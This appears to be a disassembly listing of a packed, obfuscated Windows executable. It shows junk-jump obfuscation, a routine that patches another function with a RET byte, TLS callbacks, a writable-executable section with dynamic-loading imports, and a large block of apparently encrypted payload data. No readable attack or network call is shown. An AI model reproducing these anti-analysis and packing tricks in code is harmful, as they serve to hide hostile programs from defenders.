loc_45C6A4:				; CODE XREF: sub_4490B4+7D25j
		xchg	ecx, [esp+0]
		push	esi
		call	sub_459EC3

loc_45C6AD:				; CODE XREF: y2kk37jd:0044E25Aj
		jmp	loc_44596C
; END OF FUNCTION CHUNK	FOR sub_4490B4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_447. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_45C6B3:				; CODE XREF: sub_440040+11AB4j
		jmp	loc_45C46F
; END OF FUNCTION CHUNK	FOR sub_440040

; =============== S U B	R O U T	I N E =======================================



sub_45C6B8	proc near		; CODE XREF: sub_43C498+43A4p
					; y2kk37jd:00448BA5j

; FUNCTION CHUNK AT 004442F0 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	ds:off_41E200, eax
		lea	eax, sub_43FDE6

loc_45C6C8:				; CODE XREF: sub_4411C3:loc_4579DCj
		mov	byte ptr [eax],	0C3h
		jmp	loc_4442F0
sub_45C6B8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDE6

loc_45C6D0:				; CODE XREF: sub_43FDE6+1j
		mov	eax, [esp-4+arg_0]
		jmp	loc_4578D9
; END OF FUNCTION CHUNK	FOR sub_43FDE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D6A6

loc_45C6D8:				; CODE XREF: sub_43D6A6+123D5j
		and	eax, 7
		mov	[ebp-14h], eax
		cmp	dword ptr [ebp-10h], 3
		jnb	loc_44F7BC
		jmp	loc_444C21
; END OF FUNCTION CHUNK	FOR sub_43D6A6

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45C6ED	proc near		; DATA XREF: sub_44EFD5:loc_4553E2o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004406BD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443238 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452BB3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457FEC SIZE 00000016 BYTES

		push	ebp
		mov	ebp, esp
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+4+var_4]
		jmp	loc_457FEC
sub_45C6ED	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2EB

loc_45C6FB:				; CODE XREF: sub_43B2EB:loc_44763Cj
		mov	ebp, ebx
		xchg	ebp, [esp+0]
		push	eax
		pop	ebx
		xchg	ebx, [esp+0]
		call	sub_44E4E6

loc_45C70A:				; CODE XREF: y2kk37jd:0043B3CBj
		jmp	loc_44D809
; END OF FUNCTION CHUNK	FOR sub_43B2EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_45C70F:				; CODE XREF: sub_43F911-38D2j
		push	offset sub_441F5E
		jmp	nullsub_443
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_45C719:				; CODE XREF: sub_44A298:loc_441AA6j
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_44457F
		mov	[ecx+0B8h], eax
		pop	ecx
		jmp	loc_4529A8
; END OF FUNCTION CHUNK	FOR sub_44A298
; ---------------------------------------------------------------------------
		db 36h,	12h, 0AEh
		dd 0AECE2F51h, 39BE6FD0h, 0FC60DFDEh, 0ABh, 22Eh dup(0)
y2kk37jd	ends

; Section 7. (virtual address 0005D000)
; Virtual size			: 00032000 ( 204800.)
; Section size in file		: 00032000 ( 204800.)
; Offset to raw	data for section: 0005D000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
ss_cste0	segment	para public 'CODE' use32
		assume cs:ss_cste0
		;org 45D000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
		db 0CCh
		db 0D0h, 5, 0
		align 8
		dd 0FFFFFFFFh, 5D03Ch, 5D0B4h, 5D108h, 0
		dd 0FFFFFFFFh, 5D0E8h, 5D104h, 5 dup(0)
		dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
		dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
		dd 694C6461h, 72617262h, 4179h,	65470000h, 6F725074h, 64644163h
		dd 73736572h, 0
		dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
		dd 6C6C416Ch, 636Fh, 69560000h,	61757472h, 6572466Ch, 65h
dword_45D0B4	dd 77E79F93h		; DATA XREF: sub_48A195+1DB3r
					; sub_48ED48+28r
dword_45D0B8	dd 77E805D8h		; DATA XREF: sub_48ED48+37r
dword_45D0BC	dd 77E7A5FDh		; DATA XREF: sub_48A195+7Ar
					; sub_48ED48+8Er
dword_45D0C0	dd 77E75CB5h		; DATA XREF: sub_48A195:loc_48AF86r
					; sub_48A195:loc_48B3FDr ...
dword_45D0C4	dd 77E7980Ah, 77E79E34h, 5D04Ch, 5D060h, 5D070h, 5D084h
					; DATA XREF: sub_48EEB0+1Eo
		dd 5D094h, 5D0A4h, 0
		dd 72657375h, 642E3233h, 6C6Ch,	654D0000h, 67617373h, 786F4265h
		dd 41h
dword_45D104	dd 77D6ADD7h		; DATA XREF: sub_48EDFE+64r
		dd 5D0F4h, 0
TlsDirectory	dd 0
TlsEnd_ptr	dd 0
TlsIndex_ptr	dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex	dd 0			; DATA XREF: ss.cste0:TlsIndex_ptro
TlsCallbacks	dd offset TlsCallback_0	; DATA XREF: ss.cste0:TlsCallbacks_ptro
		dd 0
; ---------------------------------------------------------------------------
		push	esi
		push	ecx
		mov	esi, eax
		mov	ecx, edx
		sub	ecx, 4
		cld

loc_45D13E:				; CODE XREF: ss.cste0:0045D155j
		lodsb
		shr	al, 1
		cmp	al, 74h
		jnz	short loc_45D154
		mov	eax, [esi]
		bswap	eax
		add	eax, ecx
		mov	[esi], eax
		add	esi, 4
		sub	ecx, 4

loc_45D154:				; CODE XREF: ss.cste0:0045D144j
		dec	ecx
		jg	short loc_45D13E
		pop	ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------
		db 8Bh,	0C0h
		dd offset sub_401000
		dd 0D000434Ah, 1, 717E0000h, 0D62820D5h, 421CFFDh, 3D050191h
		dd 42988842h, 9C1F7FD5h, 5DE1BA29h, 95191221h, 0C780B0E7h
		dd 74126A29h, 4CA9CD3Ch, 0D8BF3E90h, 301D55EAh,	3ED489F8h
		dd 22037A11h, 0D5844924h, 59C57483h, 0DC28ABF5h, 514DF1ABh
		dd 9A10211Bh, 585AC7B3h, 0BF0176BCh, 60EC626Eh,	22BB2EC4h
		dd 4303BFC2h, 99318DA7h, 200EF280h, 41AA8806h, 0A0E8DB25h
		dd 0FADD2BB6h, 3ABC80B0h, 3BCC2C5Fh, 72823A78h,	96E19221h
		dd 442B1FA0h, 6199E340h, 46A941E6h, 80F867C5h, 7D312989h
		dd 0A47D52Ch, 0E3D18B57h, 0F22419DCh, 671AA310h, 100A428Ah
		dd 0F07B3E58h, 280D5D06h, 35341A09h, 4A8AA5CDh,	0CA9D8B28h
		dd 5EFB0A10h, 0D1E25AAEh, 3738089Ch, 0D32885FBh, 0E7412832h
		dd 0F09CC6AEh, 5CE08657h, 5277A87Eh, 0CB2F66C0h, 43BFDF2Dh
		dd 996A1813h, 811201CAh, 0CFDD454h, 2405D444h, 0DB097430h
		dd 4DF0A99Ch, 0C36EC0BAh, 597877F8h, 673105Ch, 852C27AEh
		dd 0C8218EDCh, 0C696F97Fh, 0CAB50D2h, 55EA42ABh, 0C19719FDh
		dd 323E3500h, 50D59452h, 0AE1D238Dh, 0C286FAF1h, 5F246EBBh
		dd 35D211C0h, 0BF098A1Fh, 0B8205783h, 368D4C94h, 227102A6h
		dd 3652046Ah, 14637688h, 0DFF91AB5h, 1690E63Ah,	0F1A35F06h
		dd 842839CDh, 0BF397390h, 58229B8Dh, 0DA084B9Eh, 94DC2A95h
		dd 0EA5FD54Dh, 6E12F021h, 22D492B8h, 0E732ED43h, 8E500406h
		dd 9BD8B411h, 0A47D8662h, 3B450759h, 40D4DB4h, 0B253B50h
		dd 2E078253h, 0EA87A3F1h, 14815A29h, 0E8AC1C04h, 0B12DEB3Dh
		dd 0E905143Dh, 54F73262h, 2D050BC0h, 0B55C6A9h,	5E050E34h
		dd 2C47B18h, 3C1B66E9h,	2C0586E0h, 4676E481h, 737E6909h
		dd 0CEA16DB2h, 0BE3C8A28h, 91463372h, 298ED46h,	805D4312h
		dd 29CA3BE8h, 4F1B94A2h, 2C451925h, 70225682h, 3D3846BDh
		dd 2958BDA0h, 0FBE40391h, 0AA154440h, 0FA89EBA5h, 49A6337Ch
		dd 20C19EBDh, 5150D236h, 9BE0D2A0h, 0D4E35385h,	0FB2CADD7h
		dd 7C1CABADh, 69C2C828h, 51FE5894h, 83E08314h, 1369A4A5h
		dd 0D9A296E3h, 0AC18F169h, 61760515h, 83B46034h, 0B9C36896h
		dd 22829918h, 9A4D541Eh, 0B96A30A2h, 408D283Eh,	128B9114h
		dd 5199D234h, 0C340091h, 0A82C9DFEh, 1AC721C7h,	1985700Dh
		dd 0ABB347AEh, 813B5BF8h, 0CAD7B44Fh, 851DE3C6h, 4F20FEFDh
		dd 6342D140h, 230D8BAh,	878ED085h, 0D5CF0D2Ah, 87E11E88h
		dd 9CE2DE0Bh, 52D5F85Ah, 0FCF49704h, 0FA8741ACh, 4C7AB5EAh
		dd 6A4CB559h, 75B310E0h, 8A23FCABh, 9512902Fh, 21654D4Eh
		dd 61E78417h, 16179988h, 0F9C921BDh, 6CB9D062h,	1C944D64h
		dd 2FF34337h, 9AC1EDF6h, 3E1E89BEh, 0BFF8C1B5h,	42C6743Ch
		dd 0D7259283h, 0AD502423h, 0ADFD99F4h, 0A9F130ACh, 37D9FE65h
		dd 94358C4Dh, 3BE1D1B6h, 96AF5529h, 56605CE1h, 0EF03F562h
		dd 214BD722h, 1A02C6CDh, 16E1935h, 49623615h, 0B953F656h
		dd 26CBFB1Eh, 314CDA6h,	0E318F028h, 98700061h, 10DCFE40h
		dd 94020440h, 58DC6FA2h, 6AA93C3Ch, 629F1483h, 70EBF5DFh
		dd 15404D1Fh, 115028EEh, 3B8528E3h, 0CB5B14D5h,	51F5BB39h
		dd 8DE217CFh, 2B979C7Eh, 6B336BEAh, 8F4678C3h, 6ED577E2h
		dd 0D21C2E9Ah, 0B1255595h, 98B0DC6Ah, 1163AA13h, 1C532A28h
		dd 4E4D6A10h, 0D6C14518h, 19A4D7F2h, 0F084C70Ch, 1551128Ch
		dd 0BB87B4DFh, 0F38FF5A6h, 0C5193208h, 24AFC8D1h, 583C10B2h
		dd 0B9D3F0A8h, 0D5908CDEh, 9250CAA5h, 3182873Dh, 0B8C5B5B3h
		dd 5128CE72h, 3C828D1Ah, 0C4FAFADh, 1B415171h, 3097F443h
		dd 0B0D45B9Ah, 0A2B4272h, 9252762Ch, 3E44760Dh,	9176290h
		dd 0C202EE98h, 2E036826h, 70900F13h, 659E5373h,	0DE178C19h
		dd 51598E4Dh, 2678332Bh, 41A58DABh, 0BFC4783Eh,	373294Fh
		dd 1242C7E2h, 0C872F5A9h, 3ED1051h, 6898ECFAh, 0BB8F4733h
		dd 688A4BDCh, 69712456h, 53F57316h, 0CC1C6431h,	0D5C1960Dh
		dd 0EA52F88Dh, 22090AA9h, 1460606Dh, 23073BA4h,	70C2F46Dh
		dd 3130C084h, 2D470419h, 4EC57039h, 4E3F28C5h, 30AA1E16h
		dd 0D9070C1Ah, 4CD60D00h, 0E0872AC3h, 38A2A1F0h, 5523E578h
		dd 0E9C57C3Bh, 44137069h, 4DCFA108h, 2072A6F4h,	41E90C01h
		dd 88F1B86Eh, 89A1CF3Ah, 0A3D9D4B5h, 0B553E48Ah, 7661045Eh
		dd 0B5561E99h, 968D8E72h, 11288A2h, 7B62C286h, 77DBB3Eh
		dd 0F17467D3h, 0C8A48E40h, 859E5882h, 0EB908313h, 9287EFFh
		dd 0DED0C460h, 1F8C8917h, 82F30066h, 72209340h,	0EAD87DBFh
		dd 0C7FC99F6h, 3A86DC2Dh, 70020A15h, 0D0CB233Bh, 62651101h
		dd 5D38C146h, 98D3260h,	104BADDEh, 0B470DEB1h, 1BB5C3B2h
		dd 0DC4203D7h, 1DD207ADh, 0E2CBE942h, 17D5C39h,	0BA43A483h
		dd 614053CCh, 1F844BCFh, 4264A246h, 0A407EA40h,	213A9220h
		dd 6318962Ah, 0D0C988DDh, 4E54E95h, 0D865BA84h,	49044A1h
		dd 0F34C0095h, 0B82C2019h, 0FB1F81Eh, 0A21E6CAEh, 1BB6FF6Fh
		dd 0C0552F4h, 0B948893Ch, 61A02A01h, 0D869FDA0h, 2903B36Ah
		dd 0E65ABE8Eh, 0DEAE55B7h, 6F6C0101h, 191C0F45h, 808C1A34h
		dd 547F50C0h, 3C4AE500h, 0AB622189h, 507657C1h,	0E2163290h
		dd 18B108DFh, 8239A913h, 9848F448h, 10C68BCEh, 12D695CEh
		dd 38F397F1h, 16905D99h, 5A6719E8h, 3C99C4CBh, 0B54EF534h
		dd 19057073h, 55163623h, 0B6E05ACh, 3432106Fh, 2CBFF01h
		dd 89C9D504h, 0F28C6A55h, 62E0D8E5h, 540FA546h,	6EA8983Bh
		dd 0B3337F20h, 0F4CADFC2h, 496AE97Ch, 0CB827700h, 7012816Fh
		dd 0C29E4820h, 0D468A62h, 0DCBF813Bh, 8C39332Fh, 1355C43h
		dd 9166824Bh, 4960760h,	27985210h, 92DC447h, 184F2928h
		dd 38946B38h, 65062D06h, 281A1527h, 6B6C537Fh, 23B4B531h
		dd 0E54637D7h, 63D4B00h, 5A83DC3Dh, 0A5164003h,	0DB3FC681h
		dd 396C4539h, 0BDC4E06Dh, 97E46A7Ch, 23512CF1h,	1014F6A0h
		dd 85D911BBh, 0C9BE5DEAh, 0FA8035B0h, 44474B11h, 0D60A9AADh
		dd 59E17462h, 62C680A6h, 561850E2h, 88BBBCB1h, 0A8094528h
		dd 0F4565611h, 0F33396C4h, 0CAC4302Ah, 0C728B479h, 6B4742C0h
		dd 65A98A15h, 5BB6E17Ah, 0FA557D5Ch, 0A6513A53h, 0C8A0076Bh
		dd 660BC40Dh, 0FFD50DDh, 68511F92h, 2EB3C209h, 2237E582h
		dd 0E33748A8h, 22B9218Bh, 4C3D022Eh, 0E5628886h, 0AEC875ABh
		dd 8A5DA78Bh, 0F8C306Dh, 1B3E638Ah, 0A9A670ACh,	328CB8D9h
		dd 1416EC7Eh, 74A33AA9h, 18C4050Dh, 17EDCEDAh, 30334526h
		dd 0DB656D6Ch, 6354896Fh, 432B4A58h, 85A36508h,	6B56DEB8h
		dd 0D6EF50C3h, 480D6BF5h, 3401C703h, 64C15EF9h,	2ADAD813h
		dd 0B4D30E7Eh, 8BA10421h, 0CA41787Dh, 8A560DF5h, 0E3072B98h
		dd 4157497Ah, 3BFCFB0Eh, 9084532Eh, 54CA2DEFh, 56AE6202h
		dd 0CF68F250h, 0FE571D22h, 0A640FA31h, 4002FD71h, 42582E81h
		dd 0B7753106h, 35864040h, 34BC1F29h, 0E0886242h, 0BF982006h
		dd 0C256C451h, 7446844Fh, 4A1388C4h, 0C398E609h, 853043CDh
		dd 92801271h, 3E2EED0Dh, 0FC730C93h, 0AC72268Bh, 0DFE9B8A9h
		dd 4EB37A2Ah, 9388F421h, 31B7804Fh, 0AC01A6FBh,	0ED0EDF6Eh
		dd 0AA8E2CC4h, 0ED591BDAh, 620C370Bh, 0F2E192A8h, 2297FB1Ch
		dd 0B6EFA816h, 822E5F60h, 507A28B6h, 6E4E5C5Bh,	9285DDD2h
		dd 3E986F62h, 0BEC34026h, 6D2884A8h, 0F19F7682h, 1DD39B50h
		dd 0FE345B54h
		dd 0AFD7174Dh, 0DAD8C130h, 33BCA67Ch, 520838D3h, 0B16A96A3h
		dd 87309B55h, 32AE2A96h, 0AFE2DBFAh, 3469C171h,	3A82A10Eh
		dd 35348D03h, 807004ADh, 59AFEB45h, 0D2576AC6h,	1F936920h
		dd 0FFDA934Ch, 8125F16Ah, 2FA2286Ah, 13049342h,	89C2C03Dh
		dd 1CA5B89h, 308D2882h,	8241A9B4h, 0E8C250C6h, 7D8CA48Fh
		dd 20B4DB17h, 635434C1h, 0D2D355Ah, 0E423D626h,	0E4326254h
		dd 4A038E05h, 0AE99AEB6h, 3C92CD1h, 7B57CE5Ch, 1673E3C8h
		dd 52095E10h, 9C924C45h, 0D6F92C2Bh, 0C7024B84h, 75AC1A5Eh
		dd 9B47F6C7h, 0D0C8812Dh, 0EB8688B9h, 0C215B079h, 140B1FD0h
		dd 2C4B0AC6h, 5EA9B505h, 4170438Ch, 31001D0Ch, 0B1408C6Eh
		dd 31E5A04h, 0E2B7118Eh, 900835A4h, 38EC4047h, 0F7F8ACDBh
		dd 853D449h, 0B17FC8EDh, 1A0B8FD3h, 2B4E0C1Fh, 2D496A82h
		dd 75BBB4F8h, 0B5422203h, 0C0F0D7BFh, 0F4851E57h, 62F28860h
		dd 0B46C6903h, 531BCD2Eh, 3795A8E9h, 68C8CC12h,	914AFA2Fh
		dd 9A622CF3h, 1A669AD7h, 911AF18Ah, 0A56C261Ah,	94CCA9Dh
		dd 45B11265h, 7548F98Ah, 168CFF2Dh, 2C6ED58Ah, 0C24B28DAh
		dd 78A85231h, 0F43115C0h, 347A2DB8h, 86921484h,	0A36E36E2h
		dd 47C00468h, 0B0C293Ah, 6E739E29h, 4A9658C3h, 0A348110Dh
		dd 0B829CC2Dh, 872F19BEh, 0CD478DC1h, 4512DDABh, 1903A2C4h
		dd 0E6B8089Ah, 51469710h, 499F37CBh, 9A9B1487h,	0A7506D62h
		dd 25510342h, 0BA9E301h, 0A80A222Bh, 0D5505606h, 0CD46229Dh
		dd 1FA2D30Ch, 45711FAEh, 8B5434FDh, 4D09E102h, 0C78B165h
		dd 14349AE2h, 0A548B409h, 6EA7CAB8h, 1B25DCB3h,	4855CF56h
		dd 7445F76Eh, 331E0C48h, 6A921445h, 2A120415h, 0E28540EDh
		dd 0BE2FE0FBh, 5D543D32h, 78DD360Ch, 98D30639h,	0C8F2A492h
		dd 0AC805289h, 0E40DE5D0h, 65A8CF47h, 2A61530h,	9C5034CBh
		dd 39D479CEh, 30B1F8A2h, 0AD38362h, 0A5210A80h,	0C2010B0Bh
		dd 704020BCh, 93D48408h, 0CCF5F3E0h, 9759EE30h,	5A0577B0h
		dd 0ADD20B3Ch, 1538CDB1h, 0C704AEB2h, 788DDF18h, 6855317Ch
		dd 0A895DF20h, 0E05980E2h, 0A5342D1h, 101D972Bh, 1CB26C6Eh
		dd 8220AAD1h, 7166FDA8h, 5565D585h, 9616C966h, 16709887h
		dd 0E3515678h, 0A9C06122h, 9EDB7D80h, 0E4D57BEBh, 28AD354Dh
		dd 0B2D597B2h, 8F419168h, 1F34020Ch, 82853C5Dh,	52BC5945h
		dd 6C1E8504h, 0A3C10BACh, 58D76D04h, 0ACF1F153h, 0DF49E8A7h
		dd 0EFA39983h, 8F7A8061h, 0A150F46h, 73A4EC0Fh,	57975B88h
		dd 8CF19390h, 5A22DA1Fh, 8DC22C7Dh, 0AF7E80FBh,	355FF73Fh
		dd 553A373h, 0CEE776F3h, 3655EDAh, 0AED0F51Eh, 6A6EDADh
		dd 350495Fh, 98B5BC9Ah,	0D47F40FFh, 0BCF42EBh, 54ED5DA1h
		dd 0D41129DCh, 0F5116B1Dh, 0E244218Dh, 20878EE3h, 0A8A240B2h
		dd 2F028185h, 29741E40h, 0DF70EE6h, 0A42C414Ch,	17F2C06Dh
		dd 0A985437Ch, 5E948F1Eh, 68EF2BFDh, 1A21525Fh,	88F3F091h
		dd 45AD37FAh, 39ABC7ABh, 0BF5A1AC0h, 8EE7AF43h,	0CE76AC1Bh
		dd 66143941h, 0B13A9E8Ah, 7DE8AB14h, 2F1F0251h,	165DA95Fh
		dd 10DC0E1Ah, 3574110h,	0A4011D5h, 0C1F3812Fh, 9E9B9AAh
		dd 0F167FFF8h, 0B006E542h, 0E1EA2BBh, 66818DF8h, 194BD200h
		dd 6A7C0CE2h, 2702AC34h, 5EB132ECh, 914C1E53h, 5B9C14h
		dd 91336509h, 0C6B0DCE5h, 4555290Ah, 0BF089F9h,	367AAB6Eh
		dd 0EA70A4A1h, 3F08E8C7h, 9DA84044h, 54849D42h,	0D4228E4Ah
		dd 0ED442948h, 9F14080h, 90FF9044h, 0C53CDBDAh,	0BE4CE8BAh
		dd 89648296h, 7C62B31Bh, 5C168D25h, 0D618BB6Fh,	3A91737Dh
		dd 2CC28EDAh, 0D745E7A0h, 8BB92A2Fh, 6C0B2773h,	0C0BFC216h
		dd 8ACCFB23h, 306DBCE1h, 0AC3649D9h, 9B4F0A02h,	0ACC1CA09h
		dd 75A5D76h, 638085AAh,	0BEE29CD5h, 0C5F09250h,	6052F941h
		dd 29F887C3h, 3F40981h,	67DBDF7Dh, 2F00C72Ah, 1C8D54ECh
		dd 4CE07A4Dh, 6B23A5FCh, 0DB802560h, 397E710Fh,	0C08183F5h
		dd 64CE0F1h, 4E4153EAh,	0E903019Bh, 441641FAh, 33D9078Dh
		dd 52E480Ah, 0C69B0790h, 0E404DE8Dh, 0E06027D0h, 72DA4AC6h
		dd 8C7D6D2Eh, 228885A0h, 27AFB25Dh, 3024CA52h, 0A034662Ah
		dd 2FA8D6Ah, 0A351DDA6h, 1536A4A8h, 0A3511A14h,	645CCD83h
		dd 543E8D53h, 5A9B3C4Bh, 0F067B753h, 17A00121h,	4A80EAA4h
		dd 12D00B19h, 48380867h, 0D21A25A4h, 8B8C2503h,	3A8355BBh
		dd 0E0BAC145h, 134060A9h, 0C9D2C46Dh, 0ECBA5D64h, 1386EE50h
		dd 2016E92Dh, 7BEA1452h, 0EFE71A03h, 1B502026h,	5D87802Ah
		dd 8662EA85h, 2C28F033h, 0CCCEAC0Ch, 956CD140h,	65111B62h
		dd 0D14E22Bh, 5BD7A24Ah, 4CA0C675h, 6721160Bh, 0D5F2A13h
		dd 50DA8C70h, 5EA40996h, 3705A45Fh, 6027EE02h, 24F438E2h
		dd 0D6577412h, 0AACA74A1h, 1447940Dh, 93701EBDh, 1DA4F148h
		dd 91FBA202h, 0BDD64EF7h, 0B34AA480h, 4A1D98DAh, 2AB2CA02h
		dd 0F5CB25C1h, 1DC12918h, 9A45C174h, 5051A2C8h,	45613D71h
		dd 8836069Bh, 0BE1285D4h, 0C6A2F6D2h, 0A7F9FE9h, 0C2C0417Ch
		dd 0E40D25D0h, 6CA40293h, 66B26059h, 961CA802h,	2AAAD7C0h
		dd 6F17D852h, 9DA41133h, 0BFBDC596h, 4B270043h,	10FC62D6h
		dd 0D2722535h, 0B4F01F95h, 0A560A29Ah, 160216A3h, 8BF89189h
		dd 0B1B80D9h, 64045A01h, 230A9EACh, 5D19C776h, 0E148975h
		dd 5437BF25h, 0FF61A9BFh, 12A00D50h, 8AA2C454h,	0BF11C1D5h
		dd 284BEFC2h, 0A55F4389h, 30C63A6Dh, 54BF1276h,	0C7AE71Dh
		dd 2F22540Dh, 15CD2430h, 4602086Bh, 454190CCh, 51501791h
		dd 18BEBC6Ah, 0DB3F6323h, 0FA677DA3h, 828AA0ACh, 0EC3D23EAh
		dd 36CC18BAh, 0F8787025h, 0F191D37h, 0D363E11Ch, 2028AF50h
		dd 0FC2C81E9h, 69650C90h, 9D0FBD5Ch, 49215297h,	0E37610D9h
		dd 55D7276Ah, 0C3A1E853h, 403D3FC8h, 5230F2D1h,	0A3887435h
		dd 78DD91E4h, 8422A5E4h, 69020D5Ch, 0A0039104h,	0BC26D78h
		dd 7E3B33A2h, 9BC21B94h, 0D8A6A73Bh, 0D5C98471h, 0F9780782h
		dd 3FFF4031h, 9C13813Dh, 0C52EEFEh, 0D8078381h,	0E0EB4F38h
		dd 22D691D1h, 7DD1B4EAh, 28EC8D24h, 5BB6E17Ah, 24BC552Eh
		dd 181F3759h, 4FC2B47h,	0EC3C6422h, 0D0002EB0h,	0E4616517h
		dd 8053CBA3h, 0BAC5128Bh, 741D30C2h, 41C54984h,	0B3F16B47h
		dd 0AD63C43Eh, 2CA233FFh, 300ACD54h, 401E5311h,	3D0691B5h
		dd 4FAD54FEh, 1D4CFFC6h, 78D6A6A5h, 8DD7A167h, 7F45E110h
		dd 2B35A211h, 2800B116h, 9023C22Bh, 5220B704h, 0C4E0D784h
		dd 0EB788E09h, 5BD9136Bh, 14D095E5h, 59376A64h,	29B551B9h
		dd 0D853B180h, 0C69BCA2Bh, 7CD5F55Ah, 0E2146D26h, 71000125h
		dd 4F1FC0F1h, 3C3482BCh, 0EA2392F6h, 0B9881019h, 6B077411h
		dd 8006DC84h, 98938913h, 0AC3E3E95h, 1F4F8F01h,	0A8C9DF5Ah
		dd 0AD1647D3h, 7D32F353h, 631F00A9h, 4F48DF4Eh,	16ACAD70h
		dd 0EB8E84A1h, 58453AC9h, 0D53BF5C5h, 2F9A770h,	1EB6D2EBh
		dd 0C89BF0DBh, 6CDB535Dh, 86020BC0h, 2F6F8D46h,	49C0C58Ch
		dd 5B0B35CCh, 52D0E4A4h, 42EC380h, 2F145A9Dh, 91236433h
		dd 9450642Eh, 0D22E6672h, 385020C2h, 62601758h,	0F93BDD8Ch
		dd 2880CEB1h, 381A82E6h, 0C712EB16h, 0DD4EAC40h, 3ED4B7D7h
		dd 0AEBC816h, 0A05C0B84h, 3EB814C1h, 102D6360h,	203B562Eh
		dd 3A9A3408h, 8F16348Bh, 0F6D033A9h, 237FABC3h,	0FE636C6Dh
		dd 196E46C1h, 0F213778h
		dd 0CEFE0480h, 0FE8958DBh, 3AD7846Fh, 0AF6AC190h, 2D5E0860h
		dd 3CA4BF2Bh, 1C2AE1BBh, 0F04A41D8h, 99F6A031h,	0D84599ACh
		dd 637E735h, 4C01D65Ch,	62CFDC95h, 54E3B8E4h, 4E2BC4EDh
		dd 27CC29F1h, 0F072BFC5h, 0FEEE5D17h, 2FEDC170h, 0A66E1CEBh
		dd 0C9DFD53h, 0B2B6F301h, 0BD63FEEEh, 0E139365Dh, 2EB0C87Fh
		dd 0AA5FAC45h, 5CAFDABAh, 4AB0B536h, 6AF15493h,	0E0EF2C1Eh
		dd 0F2324A2Bh, 31673025h, 0E8E5410h, 51E74122h,	0C3BE3D94h
		dd 52B27F36h, 32E1057Ah, 0C285ADF7h, 0C97F4D42h, 67F67EB7h
		dd 681822D2h, 0E9819CCDh, 271F1527h, 0AB009178h, 0F8D16976h
		dd 908334Bh, 0B95E791Bh, 5A1965D3h, 0ACA2AEFAh,	1AE92ACAh
		dd 5423A1DBh, 842F2157h, 70C25141h, 14225651h, 18287544h
		dd 0AD4F228Ah, 5AD7A176h, 0F811B8A8h, 21764E5Eh, 0FAA887C2h
		dd 0ACBA9431h, 1D52DD47h, 0DFAF869Dh, 0A582BE50h, 0A017BDF6h
		dd 6A217A88h, 4F957AE7h, 1448AF86h, 27AFBA42h, 0E03DEE6Ah
		dd 81F17333h, 0A4E8B228h, 0EC408457h, 0FD35D81Bh, 0A60A0EAEh
		dd 4EBD1259h, 0E8AB2AEh, 0A8B54EC3h, 28548995h,	5E6CA2F1h
		dd 0A876D14Ch, 3BEF6F0Ah, 0AFF31637h, 0A0CBC3F2h, 570008DAh
		dd 47D8B301h, 0D4CB6665h, 0E22808F5h, 77594F4Eh, 5E816460h
		dd 6ACEC5A9h, 0FC5CAFFBh, 1E4026FBh, 0F80313B0h, 0BC528A2h
		dd 983FF2E9h, 0F5D7DCFFh, 556D7424h, 1E8AC9EBh,	0CA8B30B7h
		dd 9CDFBA37h, 1654496Ch, 0E3917C0Dh, 2FACD544h,	0A62F8257h
		dd 23A183D0h, 0DA0E0FFh, 83146F07h, 0DDEA4686h,	0BC9758EFh
		dd 0AA7ACF0Ch, 31A62810h, 5E6B481h, 0FA8FF94Ah,	0C72D9B4Bh
		dd 21172299h, 8A037609h, 5494490Ah, 0D9B7166Eh,	0EF033169h
		dd 2D57EA02h, 8A542D4Dh, 45E4C69Ah, 0CF651C7Dh,	5B0831ACh
		dd 0EF710830h, 69F2F412h, 4405B0B9h, 0F8BAAC53h, 0E1592317h
		dd 22F046BFh, 1EB87858h, 37D26223h, 0BFD16057h,	4B2619CAh
		dd 6FE9271Dh, 5229F48Ch, 0A8A5573Bh, 3A8356ABh,	0E46D281Ch
		dd 16AF0296h, 0A281AD5h, 65296266h, 3FCFECA7h, 569C0805h
		dd 4A480165h, 1EE521CCh, 7A829447h, 0B7FD3D7Dh,	0A4B096CCh
		dd 6C629997h, 2C0F9A29h, 5610F827h, 0CC62E200h,	0C3A945B4h
		dd 8F36A009h, 0FF9EE2EBh, 108C1572h, 54243C1Ch,	0D66FC0DEh
		dd 451ACE4Fh, 72DA7A8Bh, 9150AC95h, 1F830995h, 0B392A3C1h
		dd 8283899Ah, 16B36732h, 1E8EEB82h, 445A8947h, 0B9B8AE0Bh
		dd 0CCCBF99Eh, 48CF2FB4h, 104761B8h, 66616269h,	6BAF91Ch
		dd 4500587Eh, 820919D5h, 4C505600h, 671B57BAh, 0ABA32B27h
		dd 230EF147h, 57679464h, 4B30A561h, 28032C14h, 1EC3C62Ch
		dd 0BCB64AAEh, 44BA8583h, 0F7154D01h, 0B790427Fh, 41543E12h
		dd 0B05D4317h, 0B851C02Eh, 995DC651h, 0AA355D2Dh, 0B9378C9Dh
